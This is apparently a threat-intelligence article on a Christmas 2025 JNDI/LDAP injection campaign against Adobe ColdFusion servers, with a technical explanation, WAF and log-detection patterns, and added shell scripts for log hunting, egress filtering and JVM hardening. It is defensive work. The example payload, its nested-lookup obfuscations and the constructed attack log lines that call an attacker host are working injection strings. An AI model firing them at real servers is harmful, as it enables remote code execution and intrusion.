Christmas Day Barrage: Mass Exploit Campaign Hits Adobe ColdFusion Servers

Coordinated Christmas Day Attack Campaign Targets Adobe ColdFusion Servers with JNDI/LDAP Injection

HIGH
December 26, 2025
5m read
Cyberattack, Vulnerability, Threat Actor

Related Entities

Organizations: GreyNoise
Products & Tech: Adobe ColdFusion
Other: CTG Server Limited
CVE Identifiers: CVE-2023-26360

Executive Summary

A large-scale, automated attack campaign was observed targeting Adobe ColdFusion servers, with a significant spike in activity on Christmas Day, 2025. The campaign, tracked by security firm GreyNoise, was attributed to a single threat actor leveraging infrastructure in Japan. The attacker systematically attempted to exploit over a dozen different vulnerabilities in ColdFusion, including CVE-2023-26360, using JNDI/LDAP injection as the primary payload. This targeted campaign is part of a much broader reconnaissance effort by an initial access broker, who has been observed scanning the internet for 767 distinct CVEs across 47 different technologies. The goal of this operation is likely to gain a foothold in vulnerable networks and then sell that access to other threat actors, such as ransomware groups.

Threat Overview

The threat actor demonstrated a strategic approach by launching the campaign during a major holiday, a time when security teams are often understaffed and response times may be slower. The operation was highly focused, with 98% of the malicious traffic originating from two IP addresses associated with the Japanese hosting provider CTG Server Limited. The actor's use of JNDI/LDAP injection is a common technique for achieving remote code execution (RCE) on Java-based platforms like ColdFusion. The broader context reveals a sophisticated initial access broker (IAB) at work, whose business model is to compromise as many systems as possible to create a sellable inventory of compromised networks for the cybercrime ecosystem.

Technical Analysis

  1. Reconnaissance & Scanning: The actor conducted broad, indiscriminate scanning across the internet, targeting a list of 767 known CVEs. The specific focus on Adobe ColdFusion indicates it was identified as a high-value target.

  2. Exploitation: The primary attack vector was T1190 - Exploit Public-Facing Application. The attacker sent malicious HTTP requests designed to exploit various ColdFusion vulnerabilities.

  3. Payload Delivery: 80% of the observed payloads involved JNDI/LDAP injection. This technique abuses the Java Naming and Directory Interface (JNDI) by getting attacker-controlled input into a lookup, which makes the victim JVM open an outbound connection to an attacker-controlled LDAP (or RMI) server. The classic response is a naming reference that points at a remote codebase, which the JVM fetches and instantiates, resulting in RCE. That codebase path only works where the JVM still trusts remote codebases (com.sun.jndi.ldap.object.trustURLCodebase and its RMI counterpart have defaulted to false since JDK 8u191 and 11.0.1); against newer JDKs the LDAP response instead carries a serialized object that deserializes into a gadget chain already present on the ColdFusion classpath. Either way the request looks the same on the wire and the server initiates the outbound connection, which is what the detection and egress controls below key on.

    Example Payload Pattern: ${jndi:ldap://attacker-domain.com/a}
    The string can be placed in any request field that reaches a vulnerable sink (query string, POST body, or headers such as User-Agent), and is frequently obfuscated with URL encoding or nested lookups such as ${${lower:j}ndi:ldap://...}, so matching must happen after decoding.
    
  4. Objective: The actor's goal is to establish initial access. This involves deploying a simple backdoor or web shell that provides persistent access to the compromised server. This access is then packaged and sold on dark web forums.

Impact Assessment

The immediate impact of a successful compromise is the establishment of an unauthorized foothold in the organization's network. While this initial access may be silent, it is a precursor to more damaging attacks. IABs are a critical part of the cybercrime supply chain, feeding victims to ransomware gangs, data thieves, and nation-state actors. An organization compromised by this campaign could soon find itself facing a ransomware incident, a major data breach, or being used as a pivot point to attack its partners. The financial and reputational damage from such follow-on attacks can be devastating.

Cyber Observables for Detection

  • network_traffic_pattern: Inbound traffic from CTG Server Limited (Japan). 98% of attacks originated from this provider's infrastructure. The two source IPs carrying that traffic are high-confidence indicators; the provider's wider address space is a lower-confidence one, since it also hosts legitimate customers.
  • url_pattern: jndi:ldap:// or jndi:rmi:// (also jndi:dns://, and URL-encoded or nested-lookup obfuscations of the same string) in web server request logs. A strong indicator of a JNDI injection attempt; inspect headers and POST bodies, not only the URL.
  • log_source: ColdFusion logs (exception.log, coldfusion-out.log). Look for errors related to deserialization, class loading, or JNDI lookups, for example NamingException or ClassNotFoundException stack traces that follow a suspicious request.
  • process_name: coldfusion.exe or java.exe (Windows), the coldfusion wrapper and its java child (Linux). Monitor the ColdFusion process for suspicious child processes or outbound network connections to unusual destinations.

Detection & Response

  • Web Application Firewall (WAF): Implement WAF rules to detect and block common JNDI/LDAP injection strings in incoming HTTP requests. This provides a critical first line of defense.
  • Log Analysis: Aggressively monitor web server, application, and firewall logs for requests containing jndi: (after URL-decoding, since the string is often percent-encoded). Correlate these attempts with outbound connection attempts from the ColdFusion server to unknown IP addresses, typically on 389/636 (LDAP/LDAPS) or 1099 (RMI registry), but also on the non-standard ports attacker tooling favours, such as 1389 for LDAP. The callback port is attacker-chosen, so a new outbound destination from an application server is a better signal than any fixed port list.
  • EDR/Process Monitoring: Monitor the ColdFusion process for anomalous behavior, such as spawning shell commands (cmd.exe, /bin/sh) or initiating network connections to untrusted endpoints. This can detect a successful RCE.
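The log-analysis and WAF guidance above comes down to finding JNDI lookup strings, including obfuscated ones, and then checking whether the server actually called back. The following POSIX shell script is an added example, not code from the article or from GreyNoise; the access-log and egress-log lines are constructed for the example, and the IP addresses, hostnames and log formats are assumptions.

```shell
#!/bin/sh
# Added example (not from the article): hunt for JNDI lookup strings in web
# access logs and confirm exploitation by correlating with outbound connections.
# All log lines below are constructed; IPs, hostnames and formats are assumptions.

# Constructed access-log lines: one benign admin hit, three injection attempts
# (plain, nested-lookup obfuscated in the User-Agent, URL-encoded), and one
# benign search that merely contains the word "jndi".
SAMPLE_WEB_LOG='192.0.2.10 - - [25/Dec/2025:03:12:07 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.10 - - [25/Dec/2025:03:12:09 +0000] "GET /index.cfm?name=${jndi:ldap://203.0.113.5:1389/a} HTTP/1.1" 500 0 "-" "Mozilla/5.0"
192.0.2.10 - - [25/Dec/2025:03:12:11 +0000] "POST /index.cfm HTTP/1.1" 500 0 "-" "${${::-j}${lower:n}di:${lower:l}dap://203.0.113.5:1389/b}"
192.0.2.10 - - [25/Dec/2025:03:12:13 +0000] "GET /index.cfm?q=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.5%3A1099%2Fc%7D HTTP/1.1" 500 0 "-" "curl/8.0"
198.51.100.7 - - [25/Dec/2025:03:15:00 +0000] "GET /index.cfm?q=jndi+tutorial HTTP/1.1" 200 2048 "-" "Mozilla/5.0"'

# Constructed egress-firewall log for the ColdFusion host (10.0.5.20):
# two callbacks to the attacker host and one legitimate database connection.
SAMPLE_EGRESS_LOG='2025-12-25T03:12:09Z cf-web-01 OUT 10.0.5.20:51234 -> 203.0.113.5:1389 proto=tcp
2025-12-25T03:12:14Z cf-web-01 OUT 10.0.5.20:51240 -> 203.0.113.5:1099 proto=tcp
2025-12-25T03:12:30Z cf-web-01 OUT 10.0.5.20:51260 -> 10.0.9.4:1433 proto=tcp'

# Undo the two evasions that defeat a naive grep for "jndi:":
#   1. percent-encoding of the lookup characters ($ { } : /)
#   2. nested lookups that rebuild the keyword letter by letter,
#      e.g. ${lower:j}ndi or ${::-j}ndi
# Reads stdin; lines keep their original text apart from these fixes.
normalize() {
  sed -E -e 's/%24/$/g' -e 's/%7[Bb]/{/g' -e 's/%7[Dd]/}/g' -e 's/%3[Aa]/:/g' -e 's#%2[Ff]#/#g' \
         -e 's/\$\{(lower|upper):([A-Za-z])\}/\2/g' \
         -e 's/\$\{::-([^}]*)\}/\1/g'
}

# Print every request line that contains a JNDI lookup URI after normalization.
# The scheme is left open (ldap, ldaps, rmi, dns, iiop ...) because the
# callback protocol is attacker-chosen.
find_jndi_attempts() {
  normalize | grep -iE 'jndi:[a-z]+://'
}

# Extract the unique host:port callbacks named in those lookups.
callback_targets() {
  normalize | grep -ioE 'jndi:[a-z]+://[^/ "}]+' | cut -d/ -f3 | sort -u
}

# Given the callback list (one host:port per line, as $1) and the egress log on
# stdin, report which callbacks the server actually reached. A confirmed
# callback means the lookup fired server-side: treat the host as compromised
# until proven otherwise, not merely scanned.
confirm_callbacks() {
  targets=$1
  egress=$(cat)
  printf '%s\n' "$targets" | while read -r t; do
    [ -n "$t" ] || continue
    if printf '%s\n' "$egress" | grep -qF -- "-> $t "; then
      printf 'CONFIRMED %s\n' "$t"
    fi
  done
}

# Demo run over the constructed data.
echo "== JNDI lookup attempts =="
printf '%s\n' "$SAMPLE_WEB_LOG" | find_jndi_attempts
echo "== callbacks confirmed by egress log =="
printf '%s\n' "$SAMPLE_EGRESS_LOG" | confirm_callbacks "$(printf '%s\n' "$SAMPLE_WEB_LOG" | callback_targets)"
```

On real data, feed the web server's access log (with request headers logged, or the WAF's full-request log) into find_jndi_attempts and the firewall or NetFlow export for the ColdFusion host into confirm_callbacks. The same normalize step is what a WAF rule has to do before matching: a rule that looks only for the literal jndi:ldap:// misses the encoded and nested variants in the sample.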

Mitigation

  • Patch Management: The most effective mitigation is to ensure that all Adobe ColdFusion instances are fully patched against all known vulnerabilities, including older ones from 2023 and 2024. This is a core tenet of D3-SU: Software Update.
  • Egress Filtering: Restrict outbound network traffic from your ColdFusion servers. Block outbound connections on ports commonly used for JNDI attacks (e.g., LDAP, RMI) to all but explicitly approved destinations. This implements D3-OTF: Outbound Traffic Filtering.
  • Application Hardening: Set the JVM properties com.sun.jndi.ldap.object.trustURLCodebase=false and com.sun.jndi.rmi.object.trustURLCodebase=false in ColdFusion's jvm.config so the JVM refuses to load classes from a remote codebase named in a JNDI reference (this is the default on current JDKs, but pin it explicitly), and remove or restrict any JNDI lookups on untrusted input. This aligns with D3-ACH: Application Configuration Hardening. Note that these properties do not stop LDAP responses that carry a serialized gadget object, so hardening complements patching rather than replacing it.
  • Reduce Attack Surface: If ColdFusion is not essential, decommission it. If it is, ensure that only necessary components are exposed to the internet.
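The Mitigation list above describes egress filtering and JVM hardening in words. The following script is an added illustration, not code from the article or from Adobe: it renders a deny-by-default nftables egress ruleset for a ColdFusion host and pins the two trustURLCodebase properties in jvm.config. The addresses, ports, resolver and file paths are assumptions, and the ruleset is written to stdout so it can be reviewed before it is loaded.

```shell
#!/bin/sh
# Added example (not from the article or from Adobe): two host-side controls
# for a ColdFusion server. Both render or edit text so the result can be
# reviewed before anything is applied. Addresses, ports and paths are assumptions.

# 1. Deny-by-default egress as an nftables ruleset. Only the destinations the
#    application legitimately needs are reachable; an exploited lookup's
#    callback to an attacker LDAP/RMI server is dropped and logged instead.
#    Caveat: DNS is allowed to the internal resolver only, so a jndi:dns://
#    callback still resolves through that resolver; log queries there. Patch
#    downloads go through the allowlist or a proxy, not a blanket exception.
#    Usage: render_egress_ruleset "10.0.9.4:1433 10.0.9.10:443" 10.0.0.53 > cf-egress.nft
render_egress_ruleset() {
  allowed=$1     # space-separated host:port pairs (database, internal APIs ...)
  resolver=$2    # internal DNS resolver
  printf 'table inet cf_egress {\n'
  printf '  chain output {\n'
  printf '    type filter hook output priority 0; policy drop;\n'
  printf '    oifname "lo" accept\n'
  printf '    ct state established,related accept\n'
  printf '    ip daddr %s udp dport 53 accept\n' "$resolver"
  printf '    ip daddr %s tcp dport 53 accept\n' "$resolver"
  for pair in $allowed; do
    printf '    ip daddr %s tcp dport %s accept\n' "${pair%:*}" "${pair#*:}"
  done
  printf '    log prefix "cf-egress-drop " counter drop\n'
  printf '  }\n'
  printf '}\n'
}

# 2. Pin the JVM so it never loads classes from a remote codebase named in a
#    JNDI reference. The default is already false on JDK 8u191+/11.0.1+, but
#    pinning survives a JDK swap and makes the intent auditable. It does not
#    stop LDAP responses that carry a serialized gadget object, so keep patching.
#    Idempotent: a property already present (even =true) is forced to false,
#    an absent one is appended to the java.args line.
#    Usage: harden_jvm_config /opt/coldfusion/cfusion/bin/jvm.config
harden_jvm_config() {
  cfg=$1
  grep -q '^java\.args=' "$cfg" || { echo "no java.args line in $cfg" >&2; return 1; }
  for prop in com.sun.jndi.ldap.object.trustURLCodebase com.sun.jndi.rmi.object.trustURLCodebase; do
    if grep -q -- "-D$prop=" "$cfg"; then
      sed -i.bak -E "s/-D$prop=[A-Za-z]+/-D$prop=false/" "$cfg"
    else
      sed -i.bak -E "s/^(java\.args=.*)/\1 -D$prop=false/" "$cfg"
    fi
  done
  grep '^java\.args=' "$cfg"   # print the resulting line for review
}

# Demo: render the ruleset, then harden a constructed copy of jvm.config.
render_egress_ruleset "10.0.9.4:1433 10.0.9.10:443" 10.0.0.53
demo_cfg=$(mktemp)
printf 'java.home=/opt/jdk17\njava.args=-server -Xms256m -Xmx2g -Dcom.sun.jndi.ldap.object.trustURLCodebase=true\n' > "$demo_cfg"
harden_jvm_config "$demo_cfg"
```

To load the rendered ruleset, write it to a file and run nft -f on it (delete any existing cf_egress table first so rules are not duplicated), then watch the kernel log for the cf-egress-drop prefix: a drop towards an unknown host on an LDAP or RMI port right after a request containing jndi: is the exploit attempt failing at the network layer. ColdFusion reads jvm.config at startup, so the service must be restarted for the pinned properties to take effect.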

Timeline of Events

December 25, 2025: Attack activity against Adobe ColdFusion servers peaks on Christmas Day.
December 26, 2025: This article was published.

MITRE ATT&CK Mitigations

  • M1051 Update Software: Ensure all ColdFusion servers are fully patched against all known vulnerabilities to prevent exploitation. Mapped D3FEND technique: D3-SU Software Update.
  • M1037 Filter Network Traffic: Implement egress filtering to block outbound LDAP, RMI, and DNS traffic from application servers to untrusted destinations. Mapped D3FEND technique: D3-OTF Outbound Traffic Filtering.
  • M1042 Disable or Remove Feature or Program: Harden the configuration of the Java Virtual Machine (JVM) and ColdFusion so the JVM does not load classes from remote codebases named in JNDI references (trustURLCodebase=false for both LDAP and RMI). Mapped D3FEND technique: D3-ACH Application Configuration Hardening.

D3FEND Defensive Countermeasures

To effectively neutralize JNDI/LDAP injection attacks against ColdFusion servers, strict outbound traffic filtering is a critical countermeasure. A callback-based exploit requires the compromised server to initiate an outbound connection to an attacker-controlled server (e.g., via LDAP on port 389 or RMI on port 1099, though the attacker picks the port). By configuring egress firewall rules to deny all outbound traffic from ColdFusion servers by default and only allowing connections to known, legitimate destinations (such as database servers or internal APIs), organizations break that attack chain: the server can never fetch the malicious Java class or serialized object, and the blocked connection itself becomes a high-fidelity alert. This 'deny-by-default' egress policy is one of the most effective ways to mitigate the callback-dependent part of this vulnerability class. It does not stop an exploit that carries its whole payload in the request and needs no callback, so it is a complement to patching, not a substitute.

Implementing real-time URL analysis via a Web Application Firewall (WAF) or similar appliance can detect and block JNDI injection attempts before they reach the ColdFusion application. Security teams should configure their WAF with rules that specifically look for patterns like jndi:ldap://, jndi:rmi://, and other JNDI lookup syntaxes within incoming HTTP requests (including headers, URL parameters, and POST bodies), and the rules must match after URL-decoding and should also catch the nested-lookup obfuscations (such as ${${lower:j}ndi:...}) that attackers use to evade literal string matches. When a match is found, the request should be blocked and a high-priority alert should be generated. This acts as a virtual patch, protecting the application even if it has not yet been updated with the latest security fixes from Adobe, but a WAF can be bypassed by an encoding the rule did not anticipate, so it buys time for patching rather than replacing it.

Article Author

Jason Gomes

• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Threat Intelligence & Analysis, Security Orchestration (SOAR/XSOAR), Incident Response & Digital Forensics, Security Operations Center (SOC), SIEM & Security Analytics, Cyber Fusion & Threat Sharing, Security Automation & Integration, Managed Detection & Response (MDR)

Tags

Adobe ColdFusion, JNDI, LDAP Injection, Initial Access Broker, Christmas Attack, CVE-2023-26360
